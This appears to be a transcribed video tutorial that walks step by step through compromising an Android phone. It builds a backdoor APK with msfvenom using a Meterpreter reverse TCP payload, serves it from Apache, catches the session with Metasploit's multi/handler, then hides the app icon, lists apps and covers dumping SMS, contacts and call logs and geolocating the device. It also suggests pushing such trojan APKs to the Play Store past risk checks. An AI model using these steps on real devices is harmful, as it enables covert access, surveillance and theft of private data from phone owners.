So guys, now we are going to hack an Android devices by creating a binary payloads. So we can use a multiple things, not only with as an binary payloads. So there is an we can use like a fat rat. Otherwise, we can use a remote access trojans to create an APK files, and we can send to that one into like and launch in a Play Store also. So, but you need to be bypass and you need to make it as a risk level is low. Then and only you can get access here. Now, I would like to make it as a little bit big. This one now, we would like to walk toward directly a tutorial. First of all, we can create a binary payload. Now just type it as MSF Venom payload for Android. Then you specify here as meter predator. Then you just type it as reverse underscore a TCP. Then I would like to mention as a platform for an Android. Oh, sorry. Android. Now, then I would like to specify a specific functions like an Dalvik machine. Then you specify here is your L host equal to 192.168.18. And what is this? Your targeted IP address 122 is specify here as L port equal to I specify L port equal to 3242. Then I specify a raw data of I would like to put here as backdoor.apk. Now I would like to cross check one more time before I executing this one. I would like to make it as a little bit quick. You just type here as ifconfig 192.168.18.122.3242. So that's great. Now it will create a payload. Now just type it as MSF console. Now we would like to go for an MSF console. So where I have created here, now you can look here is backdoor.apk. Otherwise, now let it launch this one first. Yes, it was Metasploit is launched. Now just type it as clear. You just type it as use exploit multi handler. Now just type it as set a payload for Android meter predator. Then you just type it as reverse underscore TCP. You just type it as set L host equal to enter your target IP address 192.168.18.122. Just type it as set L port equal to 3242. Now just type it as exploit -j -z. So it will run in the background. Now we just need to copy this a backdoor.apk2 where you just need to put here as where www.html, then you just type it as share. So just type it as sudo. So you just need to paste it this. So sometimes a permissions will be denied. You just need to enter here. I just type it as ls -l. Just type it as where www html. You just type it as share where you have got it here in the background. Now it was running in the background. Now we would like to go to here. This is my Android operating system. Now I would like to open here. Now you just enter here. So you just type enter here 192.168.18.122. then you have running this an Apache servers. So I have shown you in system hacking how to run this. So just click on this backdoor.apk, then click on OK. Now just click on open. Now it will ask, so just click on install. App is installed. Now just click on open. Now you can look here, the app is open now here. Now you can look back here in the Kali Linux machine. Now you can look here where session 1 is open. Now if you want to go to the session, you just type here as sessions -i1. You just type here as ifconfig. You can look here, what is your targeted IP address 192.168.18.73, where you got here your IP config here. Now you just type here as sysinfo. You have got here local host, computer name is local host. Operating system is Android 7.1.2 and it is based with an Linux version 4.1.19. Platform with an Prime OS in the Linux. That's it. Meterpreter I was utilized as Dalvik on Android. I have shown you before here. I would like to show here Dalvik on Android. So that need to be present in the same also once you have exploited and it was changed the name also. That's it here. Now, you just type here as more. Like, let me just type here as a help. Now, uh, you can dump a call logs, dump a contacts, dump SMS, geolocate, hide app icon. You want to hide a app icon. What else you was installed? Now let me come back here. So we just don't need anything else. Now just come back here. So this is your main activity. So I just need to hide this icon. Now just type here as hide app icon. Activity main activity has was hidden. Now I can look here. Now let's go back here. Now it was hidden. You cannot able to see. Before we can see. Now we cannot able to see from here. That's it. Now send SMS sessions. So send a SMS to a target session minus I1. You must be enter both the detention address, everything. Like you just need to send an SMS. So we would like to send a SMS. So I don't want to send any type of SMS. So you just need to look here as app list. What is running in their uh, Android operating system? You can see here Chrome, clock, contacts, contact storage, every information. Where is our main activity? So this is our main activity. So if you want to app uninstall, now I want to app uninstall to go to. I would like to uninstall this main activity. That's it. Now let's look here. Not found. So you can look also, you cannot able to uninstall like wallpapers. We use a terminal emulator shell. So I would like to look here. Now just type it as again help here. You can look also geolocate. You can get a geolocations also because I'm running this one in the VMware. You cannot able to get a geolocations. So I can start an Android activity. Start an Android activity with an URI. No. So I just get a dump SMS. No SMS were found. So if there is something else you can do. So once the Android systems is in the, you have, if you get a session connected, you can do what else you like. You dump, delete, XYZ things, or you can get a read and write permissions. That's it. So if you want to go as an internally to look it out a something, so that may be a you need to go for an internally with an root relays for the Android machines also. That's it here. So we have successfully gained the access of this machine.